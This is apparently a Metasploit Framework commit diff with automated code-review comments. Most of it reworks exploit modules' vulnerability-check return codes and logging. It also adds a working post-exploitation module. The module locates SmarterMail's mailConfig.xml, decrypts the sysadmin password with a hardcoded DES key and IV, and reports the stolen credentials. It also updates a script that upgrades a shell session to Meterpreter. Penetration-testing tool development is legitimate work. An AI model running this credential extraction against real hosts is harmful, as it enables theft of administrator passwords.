+115,7 @@ class Metasploit3 < Msf::Exploit::Remote major = version[1].to_i minor = version[2].to_i if ((major < 6) or (major == 6 and minor < 11)) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end if ((major > 6) or (major == 6 and minor >= 11)) diff --git a/modules/exploits/windows/misc/hp_omniinet_2.rb b/modules/exploits/windows/misc/hp_omniinet_2.rb index f4e4a98f9a..cbd30cab80 100644 --- a/modules/exploits/windows/misc/hp_omniinet_2.rb +++ b/modules/exploits/windows/misc/hp_omniinet_2.rb 
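Review bot: In the hp_dataprotector_crs hunk the two new `# More likely to be exploitable` branches are identical except for the regex, so the comment and return are duplicated; folding them into one branch keeps the ladder readable, e.g. `if fingerprint =~ /HP Data Protector A\.06\.20: INET, internal build 370/ || fingerprint =~ /HP Data Protector A\.07\.00: INET, internal build 72/`. The comment itself would say more as `# exact builds the exploit targets; anything else on A.07 is only a family match`. The check method continues past the hunk.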
@@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote major = version[1].to_i minor = version[2].to_i if ((major < 6) or (major == 6 and minor < 11)) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end if ((major > 6) or (major == 6 and minor >= 11)) diff --git a/modules/exploits/windows/misc/hp_omniinet_3.rb b/modules/exploits/windows/misc/hp_omniinet_3.rb index d4d43993a6..08fe7d3201 100644 --- a/modules/exploits/windows/misc/hp_omniinet_3.rb +++ b/modules/exploits/windows/misc/hp_omniinet_3.rb @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote major = version[1].to_i minor = version[2].to_i if ((major < 6) or (major == 6 and minor < 11)) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end if ((major > 6) or (major == 6 and minor >= 11)) diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb index 6c932d6167..8f560dc3ed 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb @@ -82,6 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote res = ping if not res + vprint_error("No response from target") return Exploit::CheckCode::Unknown end @@ -92,9 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote if res =~ /server:.*coda 11.(\d+)/ minor = $1.to_i if minor < 2 - return Exploit::CheckCode::Vulnerable - else - return Exploit::CheckCode::Safe + return Exploit::CheckCode::Appears end end diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb index 849b526a0e..636f877c8a 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb 
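Review bot: In hp_operations_agent_coda_34 the context line `if res =~ /server:.*coda 11.(\d+)/` leaves the dot in `11.` unescaped although this commit escapes the same pattern in other modules; `/server:.*coda 11\.(\d+)/` is the intended match, and the identical regex appears in hp_operations_agent_coda_8c on the next line. The two modules also now diverge: coda_34 drops the `else return Exploit::CheckCode::Safe` so a minor >= 2 falls through to whatever follows the hunk, while coda_8c keeps it. If the fall-through in coda_34 does not end in an explicit Safe, the two checks will disagree on the same banner; the end of that method is outside the hunk so I cannot confirm.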
@@ -82,6 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote res = ping if not res + vprint_error("No response from target") return Exploit::CheckCode::Unknown end @@ -92,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote if res =~ /server:.*coda 11.(\d+)/ minor = $1.to_i if minor < 2 - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/misc/lianja_db_net.rb b/modules/exploits/windows/misc/lianja_db_net.rb index d8956c5a00..cd13ef95d9 100644 --- a/modules/exploits/windows/misc/lianja_db_net.rb +++ b/modules/exploits/windows/misc/lianja_db_net.rb @@ -54,7 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote begin connect rescue - return Exploit::CheckCode::Safe + vprint_error("Unable to connect") + return Exploit::CheckCode::Unknown end sock.put("db_net") if sock.recv(4) =~ /\d{1,5}/ diff --git a/modules/exploits/windows/misc/poisonivy_bof.rb b/modules/exploits/windows/misc/poisonivy_bof.rb index 048e1bc805..47d2eb9089 100644 --- a/modules/exploits/windows/misc/poisonivy_bof.rb +++ b/modules/exploits/windows/misc/poisonivy_bof.rb @@ -113,11 +113,12 @@ class Metasploit3 < Msf::Exploit::Remote if datalen == lensig if response[0, 16] == sig - print_status("Password appears to be \"admin\"") + vprint_status("Password appears to be \"admin\"") + return Exploit::CheckCode::Appears else - print_status("Unknown password - Bruteforce target or RANDHEADER can be tried and exploit launched until success.") + vprint_status("Unknown password - Bruteforce target or RANDHEADER can be tried and exploit launched until success.") + return Exploit::CheckCode::Detected end - return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb index 7db69b1d4d..04f05b6131 100644 
--- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb @@ -262,14 +262,14 @@ class Metasploit3 < Msf::Exploit::Remote print_status("@@version returned:\n\t" + version) # Any others? - return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.194/) - return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.384/) - return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.534/) - return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.760/) - return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.2039/) - return Exploit::CheckCode::Vulnerable if (version =~ /9\.00\.1399\.06/) - return Exploit::CheckCode::Vulnerable if (version =~ /9\.00\.2047\.00/) - return Exploit::CheckCode::Vulnerable if (version =~ /9\.00\.3042\.00/) + return Exploit::CheckCode::Appears if (version =~ /8\.00\.194/) + return Exploit::CheckCode::Appears if (version =~ /8\.00\.384/) + return Exploit::CheckCode::Appears if (version =~ /8\.00\.534/) + return Exploit::CheckCode::Appears if (version =~ /8\.00\.760/) + return Exploit::CheckCode::Appears if (version =~ /8\.00\.2039/) + return Exploit::CheckCode::Appears if (version =~ /9\.00\.1399\.06/) + return Exploit::CheckCode::Appears if (version =~ /9\.00\.2047\.00/) + return Exploit::CheckCode::Appears if (version =~ /9\.00\.3042\.00/) return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb index a3f7954ea0..12924e96ff 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb 
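Review bot: The ms09_004_sp_replwritetovarbin hunk keeps eight parallel `return Exploit::CheckCode::Appears if (version =~ ...)` lines that differ only in the build string, and the same block is repeated verbatim in ms09_004_sp_replwritetovarbin_sqli on the next line. A frozen constant and one `any?` keeps both lists in one place, and the unconverted `print_status("@@version returned:\n\t" + version)` context line would be `vprint_status` to match the rest of the commit. The check methods start before their hunks.
```ruby
VULN_BUILDS = %w[8\.00\.194 8\.00\.384 8\.00\.534 8\.00\.760 8\.00\.2039 9\.00\.1399\.06 9\.00\.2047\.00 9\.00\.3042\.00].map { |v| Regexp.new(v) }.freeze
# … unchanged: version query and print …
return Exploit::CheckCode::Appears if VULN_BUILDS.any? { |re| version =~ re }
return Exploit::CheckCode::Safe
```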
@@ -264,14 +264,14 @@ class Metasploit3 < Msf::Exploit::Remote print_status("@@version returned:\n\t" + version) # Any others? - return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.194/) - return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.384/) - return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.534/) - return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.760/) - return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.2039/) - return Exploit::CheckCode::Vulnerable if (version =~ /9\.00\.1399\.06/) - return Exploit::CheckCode::Vulnerable if (version =~ /9\.00\.2047\.00/) - return Exploit::CheckCode::Vulnerable if (version =~ /9\.00\.3042\.00/) + return Exploit::CheckCode::Appears if (version =~ /8\.00\.194/) + return Exploit::CheckCode::Appears if (version =~ /8\.00\.384/) + return Exploit::CheckCode::Appears if (version =~ /8\.00\.534/) + return Exploit::CheckCode::Appears if (version =~ /8\.00\.760/) + return Exploit::CheckCode::Appears if (version =~ /8\.00\.2039/) + return Exploit::CheckCode::Appears if (version =~ /9\.00\.1399\.06/) + return Exploit::CheckCode::Appears if (version =~ /9\.00\.2047\.00/) + return Exploit::CheckCode::Appears if (version =~ /9\.00\.3042\.00/) return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb index 121bb1b81a..0d03a237e8 100644 --- a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb +++ b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote datastore['RPORT'] = tmp_rport if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-2]\<\/div\>/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe 
diff --git a/modules/exploits/windows/novell/netiq_pum_eval.rb b/modules/exploits/windows/novell/netiq_pum_eval.rb index 70cf850d07..238b71aef4 100644 --- a/modules/exploits/windows/novell/netiq_pum_eval.rb +++ b/modules/exploits/windows/novell/netiq_pum_eval.rb @@ -75,8 +75,8 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data, }) - if res and res.body =~ /onResult/ and res.body =~ /Invalid user name or password/ and res.body =~ /2.3.1/ - return Exploit::CheckCode::Vulnerable + if res and res.body =~ /onResult/ and res.body =~ /Invalid user name or password/ and res.body =~ /2\.3\.1/ + return Exploit::CheckCode::Appears elsif res and res.body =~ /onResult/ and res.body =~ /Invalid user name or password/ return Exploit::CheckCode::Detected end diff --git a/modules/exploits/windows/oracle/client_system_analyzer_upload.rb b/modules/exploits/windows/oracle/client_system_analyzer_upload.rb index 88064ab1e8..5078c34d36 100644 --- a/modules/exploits/windows/oracle/client_system_analyzer_upload.rb +++ b/modules/exploits/windows/oracle/client_system_analyzer_upload.rb @@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Uploading the CSA#{file_name}.txt file") res = upload_file(data) if not res or res.code != 200 or (res.body !~ /posted data was written to placeholder file/ and res.body !~ /csaPostStatus=0/) - print_error("The test file could not be uploaded") + vprint_error("The test file could not be uploaded") return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/oracle/tns_arguments.rb b/modules/exploits/windows/oracle/tns_arguments.rb index 378df9dbf8..15e6217fe1 100644 --- a/modules/exploits/windows/oracle/tns_arguments.rb +++ b/modules/exploits/windows/oracle/tns_arguments.rb 
@@ -52,23 +52,18 @@ class Metasploit3 < Msf::Exploit::Remote def check connect - version = "(CONNECT_DATA=(COMMAND=VERSION))" - pkt = tns_packet(version) - sock.put(pkt) - sock.get_once - res = sock.get_once(-1, 1) - disconnect - if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ ) - return Exploit::CheckCode::Vulnerable - end - return Exploit::CheckCode::Safe + if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ ) + return Exploit::CheckCode::Appears + end + + return Exploit::CheckCode::Safe end def exploit diff --git a/modules/exploits/windows/oracle/tns_auth_sesskey.rb b/modules/exploits/windows/oracle/tns_auth_sesskey.rb index 3740af9de8..a75969a235 100644 --- a/modules/exploits/windows/oracle/tns_auth_sesskey.rb +++ b/modules/exploits/windows/oracle/tns_auth_sesskey.rb @@ -73,11 +73,12 @@ class Metasploit3 < Msf::Exploit::Remote def check version = tns_version if (not version) - fail_with(Failure::Unknown, "Unable to detect the Oracle version!") + vprint_error("Unable to detect the Oracle version!") + return Exploit::CheckCode::Unknown end - print_status("Oracle version reply: " + version) - return Exploit::CheckCode::Vulnerable if (version =~ /32-bit Windows: Version 10\.2\.0\.1\.0/) - return Exploit::CheckCode::Vulnerable if (version =~ /32-bit Windows: Version 10\.2\.0\.4\.0/) + vprint_status("Oracle version reply: " + version) + return Exploit::CheckCode::Appears if (version =~ /32-bit Windows: Version 10\.2\.0\.1\.0/) + return Exploit::CheckCode::Appears if (version =~ /32-bit Windows: Version 10\.2\.0\.4\.0/) return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/oracle/tns_service_name.rb b/modules/exploits/windows/oracle/tns_service_name.rb index 42468a055d..3eaa4cf412 100644 --- a/modules/exploits/windows/oracle/tns_service_name.rb +++ b/modules/exploits/windows/oracle/tns_service_name.rb 
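Review bot: In the tns_arguments hunk as rendered here, the new side of `check` reads `res` in `if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ )` but no assignment to `res` survives once the `version`/`pkt`/`sock.put`/`sock.get_once`/`disconnect` lines are removed, and no `disconnect` remains after `connect` either. The hunk header counts (23 old, 18 new) suggest re-indented `+` copies of those lines may have been lost in this rendering; if so ignore this, otherwise the method now raises NameError on `res` and leaks the socket. In tns_auth_sesskey, replacing `fail_with` with `vprint_error` plus Unknown is the right move for a check.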
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ ) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/postgres/postgres_payload.rb b/modules/exploits/windows/postgres/postgres_payload.rb index 216f67b212..6635980c29 100644 --- a/modules/exploits/windows/postgres/postgres_payload.rb +++ b/modules/exploits/windows/postgres/postgres_payload.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote if version[:auth] print_status "Authentication successful. Version: #{version}" - return CheckCode::Vulnerable + return CheckCode::Appears # WRITE permission needs to be proven to get CheckCode::Vulnerable else print_error "Authentication failed. #{version[:preauth] || version[:unknown]}" return CheckCode::Safe diff --git a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb index e4da02825c..1a4dee483c 100644 --- a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb +++ b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (banner =~ /CCProxy Telnet Service Ready/) - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb index cd52220873..e1d85b055b 100644 --- a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb +++ b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb 
@@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote sock.put("GET /\r\n\r\n") # Malformed request to get proxy info banner = sock.get_once || '' if (banner =~ /Server:\sWinGate\s6.1.1\s\(Build 1077\)/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/scada/indusoft_webstudio_exec.rb b/modules/exploits/windows/scada/indusoft_webstudio_exec.rb index edfaed5062..addf1d8f3a 100644 --- a/modules/exploits/windows/scada/indusoft_webstudio_exec.rb +++ b/modules/exploits/windows/scada/indusoft_webstudio_exec.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if app_info =~ /InduSoft Web Studio v6\.1/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears elsif app_info =~ /InduSoft Web Studio/ return Exploit::CheckCode::Detected end diff --git a/modules/exploits/windows/scada/procyon_core_server.rb b/modules/exploits/windows/scada/procyon_core_server.rb index 9db451612c..938db3f92e 100644 --- a/modules/exploits/windows/scada/procyon_core_server.rb +++ b/modules/exploits/windows/scada/procyon_core_server.rb @@ -74,8 +74,9 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if res =~ /Core Command Interface V1\.(.*)2/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end + return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb index c97844902e..e6db55dee7 100644 --- a/modules/exploits/windows/smb/ms08_067_netapi.rb +++ b/modules/exploits/windows/smb/ms08_067_netapi.rb 
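Review bot: In the qbik_wingate_wwwproxy hunk the context regex `/Server:\sWinGate\s6.1.1\s\(Build 1077\)/` leaves the dots in `6.1.1` unescaped, so it matches any character there, while this commit escapes version dots in its other hunks; `if (banner =~ /Server:\sWinGate\s6\.1\.1\s\(Build 1077\)/)` is the intended check. The procyon_core_server hunk on this line keys Appears off `/Core Command Interface V1\.(.*)2/`, whose greedy `(.*)` also accepts any `V1.` string ending in 2; anchoring the minor version would tighten it, but I cannot see the version format from here.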
@@ -1053,12 +1053,12 @@ class Metasploit3 < Msf::Exploit::Remote connect() smb_login() rescue Rex::ConnectionError => e - print_error("Connection failed: #{e.class}: #{e}") - return + vprint_error("Connection failed: #{e.class}: #{e}") + return Msf::Exploit::CheckCode::Unknown rescue Rex::Proto::SMB::Exceptions::LoginError => e if (e.message =~ /Connection reset/) - print_error("Connection reset during login") - print_error("This most likely means a previous exploit attempt caused the service to crash") + vprint_error("Connection reset during login") + vprint_error("This most likely means a previous exploit attempt caused the service to crash") return Msf::Exploit::CheckCode::Unknown else raise e @@ -1086,7 +1086,8 @@ class Metasploit3 < Msf::Exploit::Remote begin # Samba doesn't have this handle and returns an ErrorCode dcerpc_bind(handle) - rescue Rex::Proto::SMB::Exceptions::ErrorCode + rescue Rex::Proto::SMB::Exceptions::ErrorCode => e + vprint_error("SMB error: #{e.message.to_s}") return Msf::Exploit::CheckCode::Safe end @@ -1111,7 +1112,7 @@ class Metasploit3 < Msf::Exploit::Remote if (error == 0x0052005c) # \R :) return Msf::Exploit::CheckCode::Vulnerable else - print_status("System is not vulnerable (status: 0x%08x)" % error) if error + vprint_error("System is not vulnerable (status: 0x%08x)" % error) if error return Msf::Exploit::CheckCode::Safe end end diff --git a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb index 2dcaf2aff2..c97901a355 100644 --- a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb +++ b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (banner =~ /ESMTP TABS Mail Server for Windows NT/) - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end 
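Review bot: In the third ms08_067_netapi hunk the Safe outcome is now logged through `vprint_error`, but "System is not vulnerable" is a normal result, not a failure, so it belongs on the status channel: `vprint_status("System is not vulnerable (status: 0x%08x)" % error) if error`. In the second hunk `e.message.to_s` is redundant since `message` is already a String; `vprint_error("SMB error: #{e.message}")` reads the same. The first hunk's change from a bare `return` (nil) to CheckCode::Unknown fixes a real problem for callers of check. The check method starts before and ends after these hunks.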
diff --git a/modules/exploits/windows/smtp/ypops_overflow1.rb b/modules/exploits/windows/smtp/ypops_overflow1.rb index 25deefe2c3..41708b4586 100644 --- a/modules/exploits/windows/smtp/ypops_overflow1.rb +++ b/modules/exploits/windows/smtp/ypops_overflow1.rb @@ -62,11 +62,11 @@ class Metasploit3 < Msf::Exploit::Remote banner.gsub!(/\n/, '') if banner =~ /YahooPOPs! Simple Mail Transfer Service Ready/ - print_status("Vulnerable SMTP server: #{banner}") + vprint_status("Vulnerable SMTP server: #{banner}") return Exploit::CheckCode::Detected end - print_status("Unknown SMTP server: #{banner}") + vprint_status("Unknown SMTP server: #{banner}") return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ssh/freesshd_authbypass.rb b/modules/exploits/windows/ssh/freesshd_authbypass.rb index 5068e44677..f4a6b4b396 100644 --- a/modules/exploits/windows/ssh/freesshd_authbypass.rb +++ b/modules/exploits/windows/ssh/freesshd_authbypass.rb @@ -73,8 +73,8 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if banner =~ /SSH\-2\.0\-WeOnlyDo/ version=banner.split(" ")[1] - return Exploit::CheckCode::Vulnerable if version =~ /(2\.1\.3|2\.0\.6)/ - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Appears if version =~ /(2\.1\.3|2\.0\.6)/ + return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ssh/sysax_ssh_username.rb b/modules/exploits/windows/ssh/sysax_ssh_username.rb index 7700f50f8c..feb189f068 100644 --- a/modules/exploits/windows/ssh/sysax_ssh_username.rb +++ b/modules/exploits/windows/ssh/sysax_ssh_username.rb 
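Review bot: In the ypops_overflow1 hunk the new `vprint_status("Vulnerable SMTP server: #{banner}")` still asserts vulnerability while the return stays at CheckCode::Detected, which is only a banner match; `vprint_status("YahooPOPs! SMTP server detected: #{banner}")` matches what the code actually established. In freesshd_authbypass the version is taken from `banner.split(" ")[1]`, so a banner with no space after the identifier yields nil and the `=~` silently falls to Detected; that is pre-existing but worth a comment on the Detected return. The check methods start before their hunks.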
@@ -75,10 +75,13 @@ class Metasploit3 < Msf::Exploit::Remote connect banner = sock.get_once(-1,5) || '' disconnect + vprint_status("Banner: #{banner}") if banner =~ /SSH\-2\.0\-SysaxSSH_1\.0/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end rescue + vprint_error("An error has occured while trying to read a response from target") + return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe diff --git a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb index 3da111b348..548edfabf6 100644 --- a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb +++ b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb @@ -82,12 +82,13 @@ class Metasploit3 < Msf::Exploit::Remote def check connect - print_status("Attempting to determine if target is vulnerable...") + print_status("Attempting to determine if target is possibly vulnerable...") select(nil,nil,nil,7) banner = sock.get_once(-1,3) || '' + vprint_status("Banner: #{banner}") if (banner =~ /TelSrv 1\.5/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/post/windows/gather/credentials/smartermail.rb b/modules/post/windows/gather/credentials/smartermail.rb new file mode 100644 index 0000000000..1a9e2530d3 --- /dev/null +++ b/modules/post/windows/gather/credentials/smartermail.rb 
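Review bot: The new bare `rescue` in the check method discards the exception, so its message tells the operator nothing about why the banner read failed; `rescue => e` with `vprint_error("Error reading banner from target: #{e.class}: #{e.message}")` keeps the diagnostics while still returning Unknown. The same string has a typo: "occured" should be "occurred". The `begin` this rescue belongs to starts outside the hunk.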
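Review bot: The check method shown here calls `connect` and reads the banner but never calls `disconnect`, so every check leaves the socket open; the mailcarrier, freesshd and sysax modules touched in this same commit all disconnect right after `sock.get_once`. Add `disconnect` after `banner = sock.get_once(-1,3) || ''`, or wrap the body in `begin … ensure disconnect end`. The banner pattern `/TelSrv 1\.5/` is also unanchored and would match a 1.5x-style version if one exists; `/TelSrv 1\.5(?!\d)/` is a cheap tightening.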
@@ -0,0 +1,145 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/auxiliary/report' + +class Metasploit3 < Msf::Post + + include Msf::Post::File + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info( + info, + 'Name' => 'Windows Gather SmarterMail Password Extraction', + 'Description' => %q{ + This module extracts and decrypts the sysadmin password in the + SmarterMail 'mailConfig.xml' configuration file. The encryption + key and IV are publicly known. + + This module has been tested successfully on SmarterMail versions + 10.7.4842 and 11.7.5136. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Joe Giron', # Discovery and PoC (@theonlyevil1) + 'Brendan Coles <bcoles[at]gmail.com>', # Metasploit + 'sinn3r' # shell session support + ], + 'References' => + [ + ['URL', 'http://www.gironsec.com/blog/tag/cracking-smartermail/'] + ], + 'Platform' => ['win'], + 'SessionTypes' => ['meterpreter', 'shell'] + )) + end + + def r_host + if session.type =~ /meterpreter/ + session.sock.peerhost + else + session.session_host + end + end + + def peer + if session.type =~ /meterpreter/ + "#{r_host} (#{sysinfo['Computer']})" + else + r_host + end + end + + # + # Decrypt DES encrypted password string + # + def decrypt_des(encrypted) + return nil if encrypted.nil? 
+ decipher = OpenSSL::Cipher::DES.new + decipher.decrypt + decipher.key = "\xb9\x9a\x52\xd4\x58\x77\xe9\x18" + decipher.iv = "\x52\xe9\xc3\x9f\x13\xb4\x1d\x0f" + decipher.update(encrypted) + decipher.final + end + + # + # Find SmarterMail 'mailConfig.xml' config file + # + def get_mail_config_path + found_path = '' + drive = expand_path('%SystemDrive%').strip + + ['Program Files (x86)', 'Program Files'].each do |program_dir| + path = %Q|#{drive}\\#{program_dir}\\SmarterTools\\SmarterMail\\Service\\mailConfig.xml|.strip + vprint_status "#{peer} - Checking for SmarterMail config file: #{path}" + if file?(path) + found_path = path + break + end + end + + found_path + end + + # + # Retrieve username and decrypt encrypted password string from the config file + # + def get_smartermail_creds(path) + result = {} + data = '' + + vprint_status "#{peer} - Retrieving SmarterMail sysadmin password" + begin + data = read_file(path) + rescue Rex::Post::Meterpreter::RequestError => e + print_error "#{peer} - Failed to download #{path} - #{e.to_s}" + return result + end + + if data.blank? + print_error "#{peer} - Configuration file is empty." + return result + end + + username = data.match(/<sysAdminUserName>(.+)<\/sysAdminUserName>/) + password = data.match(/<sysAdminPassword>(.+)<\/sysAdminPassword>/) + result['username'] = username[1] unless username.nil? + result['password'] = decrypt_des(Rex::Text.decode_base64(password[1])) unless password.nil? + result + end + + # + # Find the config file, extract the encrypted password and decrypt it + # + def run + # check for SmartMail config file + config_path = get_mail_config_path + if config_path.blank? + print_error "#{peer} - Could not find SmarterMail config file" + return + end + + # retrieve username and decrypted password from config file + result = get_smartermail_creds(config_path) + if result['password'].nil? 
+ print_error "#{peer} - Could not decrypt password string" + return + end + + # report result + user = result['username'] + pass = result['password'] + print_good "#{peer} - Found Username: '#{user}' Password: '#{pass}'" + report_auth_info( + :host => r_host, + :sname => 'http', + :user => user, + :pass => pass, + :source_id => session.db_record ? session.db_record.id : nil, + :source_type => 'vuln') + end +end diff --git a/scripts/shell/spawn_meterpreter.rb b/scripts/shell/spawn_meterpreter.rb index d45e9d4ac4..87a87ce691 100644 --- a/scripts/shell/spawn_meterpreter.rb +++ b/scripts/shell/spawn_meterpreter.rb 
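Review bot: `decrypt_des` lets `decipher.final` raise OpenSSL::Cipher::CipherError when the base64 payload is truncated or the padding is wrong, so a malformed `<sysAdminPassword>` value aborts the module instead of reaching the "Could not decrypt password string" branch in `run`, which only handles a nil result. Wrap the update/final calls in a begin block with `rescue OpenSSL::Cipher::CipherError => e` / `print_error "#{peer} - Failed to decrypt password: #{e.message}"` / `nil`. `get_smartermail_creds` similarly rescues only Rex::Post::Meterpreter::RequestError, yet the module advertises shell sessions too, so a read failure there propagates uncaught; `rescue => e` would cover both session types. The file does not require 'openssl' itself; if msf/core does not load it, add `require 'openssl'` next to the other requires.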
@@ -18,17 +18,39 @@ def progress(total, sent) end -raise RuntimeError, "You must select a session." if (not session) -raise RuntimeError, "Selected session is not a command shell session!" if (session.type != "shell") +# +# Returns if a port is used by a session +# +def is_port_used?(port) + framework.sessions.each do |sid, obj| + local_info = obj.instance_variable_get(:@local_info) + return true if local_info =~ /:#{port}$/ + end -# Check for required datastore options -if (not session.exploit_datastore['LHOST'] or not session.exploit_datastore['LPORT']) - raise RuntimeError, "You must set LPORT and LHOST for this script to work." + false end +# +# Mimics what MSF alreayd does if the user doesn't manually select a payload and lhost +# +lhost = framework.datastore['LHOST'] +unless lhost + lhost = Rex::Socket.source_address +end -lhost = session.exploit_datastore['LHOST'] -lport = session.exploit_datastore['LPORT'] +# +# If there is no LPORT defined in framework, then pick a random one that's not used +# by current sessions. This is possible if the user assumes module datastore options +# are the same as framework datastore options. +# +lport = framework.datastore['LPORT'] +unless lport + lport = 4444 # Default meterpreter port + while is_port_used?(lport) + # Pick a port that's not used + lport = [*49152..65535].sample + end +end # maybe we want our sessions going to another instance? use_handler = true diff --git a/spec/msfcli_spec.rb b/spec/msfcli_spec.rb index d2133b28ff..1cf222b4e6 100644 --- a/spec/msfcli_spec.rb +++ b/spec/msfcli_spec.rb @@ -369,7 +369,7 @@ describe Msfcli do m = cli.init_modules cli.engage_mode(m) } - stdout.should =~ /failed/ + stdout.should =~ /#{Msf::Exploit::CheckCode::Unknown[1]}/ end it "should warn my auxiliary module isn't supported by mode 'p' (show payloads)" do diff --git a/tools/metasm_shell.rb b/tools/metasm_shell.rb index 68f8126db1..c2610105b3 100755 --- a/tools/metasm_shell.rb +++ b/tools/metasm_shell.rb 
